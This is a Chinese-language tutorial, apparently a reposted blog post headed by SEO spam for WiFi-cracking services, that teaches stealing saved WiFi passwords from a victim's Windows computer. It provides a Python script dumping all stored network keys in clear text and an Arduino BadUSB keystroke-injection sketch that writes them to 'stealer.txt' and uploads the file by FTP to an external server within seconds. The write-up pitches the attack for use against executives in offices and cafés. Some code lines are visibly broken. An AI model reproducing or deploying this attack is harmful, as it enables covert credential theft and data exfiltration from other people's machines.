你电脑的 WiFi 密码全是我的

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

import os
import re
wifi=('netsh wlan show profiles ')
#name=Hello World key=clear
with os.popen(wifi) as f:
   wifiname_list=[]
   for line in f:
       if'所有用户配置文件 :'in line:
           #print(line)
           line= line.strip()
           wifiname= line.split(':')[1]
           wifiname_list.append(wifiname)
   print(wifiname_list)
for i in wifiname_list:
   get=('netsh wlan show profiles name={} key=clear').format(i)
   withos.popen(get) asr:
       print(r.read())
   r.close()  
   #可以自己添加一些语句把输出保存到U盘或者某个地方(感谢群里面的小姐姐对本代码的修改和审核--CTF 小姐姐)

本文作者:hodit/98(信安之路无线安全小组)

无线技术的发展使我们享受到了无线自由的便利,但也带来了越来越多的安全问题。目前主流的WiFi密码破解方法,如跑字典和钓鱼WiFi,都有各自的优缺点。跑字典需要大量的字典数据和算力设备,而钓鱼WiFi则需要长时间的等待。然而,这些方法并不能百分之百地破解目标WiFi密码。接下来,我们将介绍一种非常简单的方法来收集WiFi密码和WiFi名称。

在之前的文章《打造属于自己的渗透神器2》中,我们提到可以使用DOS命令自动搜索WiFi密码。现在,让我们来实现这个方法。我们都知道,每个WiFi都有其信号范围,如果我们想要破解某个WiFi,就需要在该范围内进行操作。当然,我们的攻击也需要在目标电脑上运行一个DOS命令,用于查询该电脑之前连接过的WiFi密码。

下面是显示了目前这台电脑连接过的WiFi密码的DOS命令。当我们想要显示某一个WiFi的密码时,如图所示,会出现该WiFi的相关信息。我们继续往下看,会看到我们想要的密码。接下来,我们需要整理思路!

整理完思路后,我们就可以开始动手了!

wifi字典跑峰包

运行完后,我们得到了我们想要的结果。但是,你有没有想过,当我在目标电脑上运行这个程序时,至少需要目标电脑的用户离开电脑一分钟左右。为什么呢?因为你需要将这个程序安装到目标电脑上并运行,然后保存目标电脑上的所有WiFi连接数据,或者将其复制到U盘中。这些都需要时间,并且可能会被杀毒软件查杀。

#include //包含键盘模块的头文件
Keyboard.begin(); //开启键盘通信
Keyboard.press(); //按下某个键
Keyboard.release();//释放某个键
Keyboard.println(); //输入某些内容和一些网上的解释不同 网上解释是输入内容并且能回车,而我测试的时候并不能回车可能和版本有关 不要不要担心有办法回车
Keyboard.end(); //结束键盘通信

那么,有没有办法在极短的时间内将目标电脑上的所有WiFi数据发送到一个地方呢?当然有!请看这里:

我们可以将HID攻击与之组合。HID代表Human Interface Device,根据名称可以了解到HID设备是直接与人交互的设备,例如键盘、鼠标和游戏杆等。但是,HID设备并不一定需要人机接口,只要符合HID类别规范的设备都可以被称为HID设备。一般来说,针对HID的攻击主要集中在键盘和鼠标上,因为只要控制了用户的键盘,基本上就等于控制了用户的电脑。攻击者会将攻击隐藏在一个正常的鼠标或键盘中,当用户将带有攻击向量的鼠标或键盘插入电脑时,恶意代码会被加载和执行。

这时,我们的思路就要改变了:

实验环境(以下实验具有一定的攻击性):

  1. Teensy++ 2.0(硬件)价格在30-50元之间
  2. Teensyduino插件
  3. Arduino环境
  4. Digispark ATtiny(本项目使用的环境,在之前的文章中有提到《》)

既然是HID攻击,我们就需要知道键盘输入的语句。Arduino提供了以下键盘函数。

wifi字典跑峰包

void setup()      //初始化函数
{
delay(500);
Keyboard.begin();
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
delay(500);
Keyboard.press('r');
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("cmd");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.print("E:");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.print("netsh wlan show profile name=* key=clear > stealer.txt");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(2000);
Keyboard.print("ftp -i 009.3vftp.com"); // ftp服务器地址
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(3000);
Keyboard.print("your username");  //ftp账号 Keyboard.press(KEY_RETURN);   Keybo
ard.release(KEY_RETURN);
delay(1000);
Keyboard.print("your password");    //ftp密码 Keyboard.press(KEY_RETURN);   Keybo
ard.release(KEY_RETURN);
delay(1000);
Keyboard.print("put stealer.txt");  delay(3000);  Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
}
void loop() {   }   //循环函数

攻击程序:

运行完后,如图所示,目标电脑会向攻击者的FTP地址发送之前保存的所有WiFi密码和名称。我们可以发现,这次攻击只花费了0.47秒就完成了对本机所有WiFi密码的搜索、保存和上传。

总结:
这种攻击方法相对隐蔽,但危害性较大。例如,如果你是某企业的高管,每天带着电脑去各个地方开会,连接各种无线网络,你的电脑会保存很多地方的WiFi密码和名称。只要攻击者接触你的电脑2-3秒钟,就可以完成对你电脑上WiFi密码和名称的收集和上传,从而进行一些恶意操作。这种攻击手法非常适合在会议室、办公室、咖啡厅等地使用,只需要抓住几秒钟的时间就可以完成攻击。

不知道这个演示给你们带来了什么样的思考,对我来说,安全就是在眨眼间发生的事情。既然可以收集WiFi密码,那也就可以收集电脑中的数据并进行上传。

赞(0)